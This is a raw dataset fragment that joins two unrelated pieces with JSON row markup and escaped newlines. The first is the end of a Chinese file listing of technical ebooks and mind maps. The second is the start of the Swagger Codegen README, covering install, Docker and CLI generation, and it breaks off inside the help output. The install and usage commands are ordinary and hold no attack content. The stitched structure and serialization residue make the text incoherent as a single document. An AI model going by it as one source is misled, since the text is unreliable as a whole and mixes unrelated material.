网络爬虫系列.epub\n\t\t\t\t* 网页性能管理详解.epub\n\t\t\t\t* 翻译漫谈——怎样翻译更地道.epub\n\t\t\t\t* 背包问题九讲.epub\n\t\t\t\t* 腾讯alloyteam团队前端代码规范.epub\n\t\t\t\t* 菜鸟学SSH.mobi\n\t\t\t\t* 蓝色铁骑.epub\n\t\t\t\t* 解析 Android 架构设计原则.epub\n\t\t\t\t* 让web app更快的HTML5最佳实践.epub\n\t\t\t\t* 设计模式.epub\n\t\t\t\t* 设计模式与系统架构.epub\n\t\t\t\t* 超实用的IOS 9人机界面指南.epub\n\t\t\t\t* 趣味算法设计.epub\n\t\t\t\t* 跟着ym学习Android5.0.epub\n\t\t\t\t* 踟蹰MySQL.epub\n\t\t\t\t* 轻松python-文本专题.epub\n\t\t\t\t* 轻松把玩HttpClient.epub\n\t\t\t\t* 轻松搞定RabbitMQ.epub\n\t\t\t\t* 重拾 CSS 的乐趣.epub\n\t\t\t\t* 零日漏洞:震网病毒全揭秘.epub\n\t\t\t\t* 面向对象设计模式.epub\n\t\t\t\t* 面向指针编程.epub\n\t\t\t\t* 飞鸟集.epub\n\t\t\t\t* 高效运维最佳实践.epub\n\t\t\t\t* 高斯模糊的算法.epub\n\n\n\t\t\tACCESS CONTROL.xmind\n\t\t\tAndroid笔记.xmind\n\t\t\tApp Store最新审核指南.xmind\n\t\t\tCMMI.CHM\n\t\t\tDBA.xmind\n\t\t\tFunctional Interfaces in Java.pdf\n\t\t\tHTML5.xmind\n\t\t\tIOAM.xmind\n\t\t\tJava.png\n\t\t\tJava.xmind\n\t\t\tLR 227个问题.CHM\n\t\t\tOKR工作法:谷歌、领英等顶级公司的高绩效秘籍-克里斯蒂娜·沃特克.pdf\n\t\t\tOWASP-2017.png\n\t\t\tSEO百科.xmind\n\t\t\tSEO相关.xmind\n\t\t\tType.png\n\t\t\tVBS教程.chm\n\t\t\tVB初哥教学.chm\n\t\t\tWP-Understanding Java Garbage Collection.pdf\n\t\t\tWeb前端技能树.xmind\n\t\t\tbig-data.xmind\n\t\t\tcloudComputing.xmind\n\t\t\tdev-lang-Go.xmind\n\t\t\tdev-lang-total.xmind\n\t\t\tfrontEnd.xmind\n\t\t\tiOS知识点.xmind\n\t\t\tiOS证书&打包&上架.xmind\n\t\t\tjava知识结构图.jpg\n\t\t\tmicro-service.xmind\n\t\t\tsecurity.xmind\n\t\t\tskill.jpg\n\t\t\tvc_sx.chm\n\t\t\t乔梁-google软件测试之道-笔记.xmind\n\t\t\t代码之髓.xmind\n\t\t\t信息安全工作.xmind\n\t\t\t安全结构分解.xmind\n\t\t\t平台_效率平台研发.xmind\n\t\t\t我眼中的测试.xmind\n\t\t\t未来是湿的:无组织的组织力量-克莱•舍基.pdf\n\t\t\t正则表达式.xmind\n\t\t\t测试新手学习宝典.chm\n\t\t\t測試全景.gif\n\t\t\t职能地图-Android.xmind\n\t\t\t职能地图-Java.xmind\n\t\t\t职能地图-个人 v2.0 .xmind\n\t\t\t职能地图-个人.xmind\n\t\t\t规范.xmind\n\t\t\t计算机安全使用.xmind\n\t\t\t计算机安全使用第三级别.png\n\t\t\t软件安全测试经典定义.xmind\n\t\t\t软件测试.xmind\n\t\t\t软考-信息系统项目管理师.xmind\n\t\t\t软考-系统分析师.xmind\n\t\t\t运维工作.xmind\n\t\t\t阿里云盾.xmind\n\t\t\t阿里云网关的使用和配置.xmind\n\t\t\t需要出的安全规范0.01.xmind\n\n\t\t前端规范计划.xmind\t\n\t\t質量和效率提升.xmind\t\n"}}},{"rowIdx":559,"cells":{"text":{"kind":"string","value":"# Swagger Code Generator\n\n[![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen)\n[![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Template%20Test)](https://app.shippable.com/projects/5782588a3be4f4faa56c5bea)\n[![Windows Test](https://ci.appveyor.com/api/projects/status/github/swagger-api/swagger-codegen?branch=master&svg=true&passingText=Windows%20Test%20-%20OK&failingText=Windows%20Test%20-%20Fails)](https://ci.appveyor.com/project/WilliamCheng/swagger-codegen-wh2wu)\n[![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project)\n[![PR Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/pr)](http://issuestats.com/github/swagger-api/swagger-codegen) [![Issue Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/issue)](http://issuestats.com/github/swagger-api/swagger-codegen)\n\n:star::star::star: If you would like to contribute, please refer to [guidelines](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md) and a list of [open tasks](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22).:star::star::star:\n\n:notebook_with_decorative_cover: For more information, please refer to the [Wiki page](https://github.com/swagger-api/swagger-codegen/wiki) and [FAQ](https://github.com/swagger-api/swagger-codegen/wiki/FAQ) :notebook_with_decorative_cover:\n\n:warning: If the OpenAPI/Swagger spec is obtained from an untrusted source, please make sure you've reviewed the spec before using Swagger Codegen to generate the API client, server stub or documentation as [code injection](https://en.wikipedia.org/wiki/Code_injection) may occur :warning:\n\n:rocket: ProductHunt: https://producthunt.com/posts/swagger-codegen :rocket:\n\n## Overview\nThis is the swagger codegen project, which allows generation of API client libraries (SDK generation), server stubs and documentation automatically given an [OpenAPI Spec](https://github.com/OAI/OpenAPI-Specification). Currently, the following languages/frameworks are supported:\n\n- **API clients**: **ActionScript**, **Bash**, **C#** (.net 2.0, 4.0 or later), **C++** (cpprest, Qt5, Tizen), **Clojure**, **Dart**, **Elixir**, **Go**, **Groovy**, **Haskell**, **Java** (Jersey1.x, Jersey2.x, OkHttp, Retrofit1.x, Retrofit2.x, Feign), **Node.js** (ES5, ES6, AngularJS with Google Closure Compiler annotations) **Objective-C**, **Perl**, **PHP**, **Python**, **Ruby**, **Scala**, **Swift** (2.x, 3.x), **Typescript** (Angular1.x, Angular2.x, Fetch, Node)\n- **Server stubs**: **C#** (ASP.NET Core, NancyFx), **Erlang**, **Go**, **Haskell**, **Java** (MSF4J, Spring, Undertow, JAX-RS: CDI, CXF, Inflector, RestEasy), **PHP** (Lumen, Slim, Silex, [Zend Expressive](https://github.com/zendframework/zend-expressive)), **Python** (Flask), **NodeJS**, **Ruby** (Sinatra, Rails5), **Scala** ([Finch](https://github.com/finagle/finch), Scalatra)\n- **API documentation generators**: **HTML**, **Confluence Wiki** \n- **Others**: **JMeter**\n\nCheck out [OpenAPI-Spec](https://github.com/OAI/OpenAPI-Specification) for additional information about the OpenAPI project.\n\n# Table of contents\n\n - [Swagger Code Generator](#swagger-code-generator)\n - [Overview](#overview)\n - [Table of Contents](#table-of-contents)\n - Installation\n - [Compatibility](#compatibility)\n - [Prerequisites](#prerequisites)\n - [OS X Users](#os-x-users)\n - [Building](#building)\n - [Docker](#docker)\n - [Build and run](#build-and-run-using-docker)\n - [Run docker in Vagrant](#run-docker-in-vagrant)\n - [Public Docker image](#public-docker-image)\n - [Homebrew](#homebrew)\n - [Getting Started](#getting-started)\n - Generators\n - [To generate a sample client library](#to-generate-a-sample-client-library)\n - [Generating libraries from your server](#generating-libraries-from-your-server)\n - [Modifying the client library format](#modifying-the-client-library-format)\n - [Making your own codegen modules](#making-your-own-codegen-modules)\n - [Where is Javascript???](#where-is-javascript)\n - [Generating a client from local files](#generating-a-client-from-local-files)\n - [Customizing the generator](#customizing-the-generator)\n - [Validating your OpenAPI Spec](#validating-your-openapi-spec)\n - [Generating dynamic html api documentation](#generating-dynamic-html-api-documentation)\n - [Generating static html api documentation](#generating-static-html-api-documentation)\n - [To build a server stub](#to-build-a-server-stub)\n - [To build the codegen library](#to-build-the-codegen-library)\n - [Workflow Integration](#workflow-integration)\n - [Github Integration](#github-integration)\n - [Online Generators](#online-generators)\n - [Guidelines for Contribution](https://github.com/swagger-api/swagger-codegen/wiki/Guidelines-for-Contribution)\n - [Companies/Projects using Swagger Codegen](#companiesprojects-using-swagger-codegen)\n - [Swagger Codegen Core Team](#swagger-codegen-core-team)\n - [Swagger Codegen Evangelist](#swagger-codegen-evangelist)\n - [License](#license)\n\n\n## Compatibility\nThe OpenAPI Specification has undergone 3 revisions since initial creation in 2010. The swagger-codegen project has the following compatibilities with the OpenAPI Specification:\n\nSwagger Codegen Version | Release Date | OpenAPI Spec compatibility | Notes\n-------------------------- | ------------ | -------------------------- | -----\n2.3.0 (upcoming minor release) | Apr/May 2017 | 1.0, 1.1, 1.2, 2.0 | Minor release with breaking changes\n2.2.3 (upcoming patch release) | TBD | 1.0, 1.1, 1.2, 2.0 | Patch release without breaking changes\n2.2.2 (**current stable**) | 2017-03-01 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.2](https://github.com/swagger-api/swagger-codegen/tree/v2.2.2)\n2.2.1 | 2016-08-07 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.1](https://github.com/swagger-api/swagger-codegen/tree/v2.2.1)\n2.1.6 | 2016-04-06 | 1.0, 1.1, 1.2, 2.0 | [tag v2.1.6](https://github.com/swagger-api/swagger-codegen/tree/v2.1.6)\n2.0.17 | 2014-08-22 | 1.1, 1.2 | [tag v2.0.17](https://github.com/swagger-api/swagger-codegen/tree/v2.0.17)\n1.0.4 | 2012-04-12 | 1.0, 1.1 | [tag v1.0.4](https://github.com/swagger-api/swagger-codegen/tree/swagger-codegen_2.9.1-1.1)\n\n\n### Prerequisites\nIf you're looking for the latest stable version, you can grab it directly from Sonatype.org (Java 7 runtime at a minimum):\n\n```\nwget https://oss.sonatype.org/content/repositories/releases/io/swagger/swagger-codegen-cli/2.2.2/swagger-codegen-cli-2.2.2.jar -O swagger-codegen-cli.jar\n\njava -jar swagger-codegen-cli.jar help\n```\n\nOn a mac, it's even easier with `brew`:\n```\nbrew install swagger-codegen\n```\n\nTo build from source, you need the following installed and available in your $PATH:\n\n* [Java 7 or 8](http://java.oracle.com)\n\n* [Apache maven 3.3.3 or greater](http://maven.apache.org/)\n\n#### OS X Users\nDon't forget to install Java 7 or 8. You probably have 1.6.\n\nExport JAVA_HOME in order to use the supported Java version:\n```\nexport JAVA_HOME=`/usr/libexec/java_home -v 1.8`\nexport PATH=${JAVA_HOME}/bin:$PATH\n```\n\n### Building\n\nAfter cloning the project, you can build it from source with this command:\n```\nmvn clean package\n```\n\n### Homebrew\n\nTo install, run `brew install swagger-codegen`\n\nHere is an example usage:\n```\nswagger-codegen generate -i http://petstore.swagger.io/v2/swagger.json -l ruby -o /tmp/test/\n```\n\n### Docker\n\n#### Development in docker\n\nYou can use `run-in-docker.sh` to do all development. This script maps your local repository to `/gen`\nin the docker container. It also maps `~/.m2/repository` to the appropriate container location.\n\nTo execute `mvn package`:\n\n```\ngit clone https://github.com/swagger-api/swagger-codegen\ncd swagger-codegen\n./run-in-docker.sh mvn package\n```\n\nBuild artifacts are now accessible in your working directory.\n\nOnce built, `run-in-docker.sh` will act as an executable for swagger-codegen-cli. To generate code, you'll need to output to a directory under `/gen` (e.g. `/gen/out`). For example:\n\n```\n./run-in-docker.sh help # Executes 'help' command for swagger-codegen-cli\n./run-in-docker.sh langs # Executes 'langs' command for swagger-codegen-cli\n./run-in-docker.sh /gen/bin/go-petstore.sh # Builds the Go client\n./run-in-docker.sh generate -i modules/swagger-codegen/src/test/resources/2_0/petstore.yaml \\\n -l go -o /gen/out/go-petstore -DpackageName=petstore # generates go client, outputs locally to ./out/go-petstore\n```\n\n#### Run Docker in Vagrant\nPrerequisite: install [Vagrant](https://www.vagrantup.com/downloads.html) and [VirtualBox](https://www.virtualbox.org/wiki/Downloads).\n ```\ngit clone http://github.com/swagger-api/swagger-codegen.git\ncd swagger-codegen\nvagrant up\nvagrant ssh\ncd /vagrant\n./run-in-docker.sh mvn package\n ```\n\n#### Public Pre-built Docker images\n\n - https://hub.docker.com/r/swaggerapi/swagger-generator/ (official web service)\n - https://hub.docker.com/r/swaggerapi/swagger-codegen-cli/ (official CLI)\n=======\n\n##### Swagger Generator Docker Image\n\nThe Swagger Generator image can act as a self-hosted web application and API for generating code. This container can be incorporated into a CI pipeline, and requires at least two HTTP requests and some docker orchestration to access generated code.\n\nExample usage (note this assumes `jq` is installed for command line processing of JSON):\n\n```\n# Start container and save the container id\nCID=$(docker run -d swaggerapi/swagger-generator)\n# allow for startup\nsleep 5\n# Get the IP of the running container\nGEN_IP=$(docker inspect --format '{{.NetworkSettings.IPAddress}}' $CID)\n# Execute an HTTP request and store the download link\nRESULT=$(curl -X POST --header 'Content-Type: application/json' --header 'Accept: application/json' -d '{\n \"swaggerUrl\": \"http://petstore.swagger.io/v2/swagger.json\"\n}' 'http://localhost:8188/api/gen/clients/javascript' | jq '.link' | tr -d '\"')\n# Download the generated zip and redirect to a file\ncurl $RESULT > result.zip\n# Shutdown the swagger generator image\ndocker stop $CID && docker rm $CID\n```\n\nIn the example above, `result.zip` will contain the generated client.\n\n##### Swagger Codegen Docker Image\n\nThe Swagger Codegen image acts as a standalone executable. It can be used as an alternative to installing via homebrew, or for developers who are unable to install Java or upgrade the installed version.\n\nTo generate code with this image, you'll need to mount a local location as a volume.\n\nExample:\n\n```\ndocker run --rm -v ${PWD}:/local swagger-api/swagger-codegen generate \\\n -i http://petstore.swagger.io/v2/swagger.json \\\n -l go \\\n -o /local/out/go\n```\n\nThe generated code will be located under `./out/go` in the current directory.\n\n## Getting Started\n\nTo generate a PHP client for http://petstore.swagger.io/v2/swagger.json, please run the following\n```sh\ngit clone https://github.com/swagger-api/swagger-codegen\ncd swagger-codegen\nmvn clean package\njava -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \\\n -i http://petstore.swagger.io/v2/swagger.json \\\n -l php \\\n -o /var/tmp/php_api_client\n```\n(if you're on Windows, replace the last command with `java -jar modules\\swagger-codegen-cli\\target\\swagger-codegen-cli.jar generate -i http://petstore.swagger.io/v2/swagger.json -l php -o c:\\temp\\php_api_client`)\n\nYou can also download the JAR (latest release) directly from [maven.org](http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.1/swagger-codegen-cli-2.2.1.jar )\n\nTo get a list of **general** options available, please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar help generate`\n\nTo get a list of PHP specified options (which can be passed to the generator with a config file via the `-c` option), please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l php`\n\n## Generators\n\n### To generate a sample client library\nYou can build a client against the swagger sample [petstore](http://petstore.swagger.io) API as follows:\n\n```\n./bin/java-petstore.sh\n```\n\n(On Windows, run `.\\bin\\windows\\java-petstore.bat` instead)\n\nThis will run the generator with this command:\n\n```\njava -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \\\n -i http://petstore.swagger.io/v2/swagger.json \\\n -l java \\\n -o samples/client/petstore/java\n```\n\nwith a number of options. You can get the options with the `help generate` command:\n\n```\nNAME\n swagger-codegen-cli generate - Generate code with chosen lang\n\nSYNOPSIS\n swagger-codegen-cli generate\n [(-a | --auth )]\n [--additional-properties ]\n [--api-package ] [--artifact-id ]\n [--artifact-version ]\n [(-c | --config )]\n [-D ] [--group-id ]\n (-i | --input-spec )\n [--import-mappings ]\n [--instantiation-types ]\n [--invoker-package ]\n (-l | --lang )\n [--language-specific-primitives ]\n [--library ] [--model-package ]\n [(-o | --output )]\n [(-s | --skip-overwrite)]\n [(-t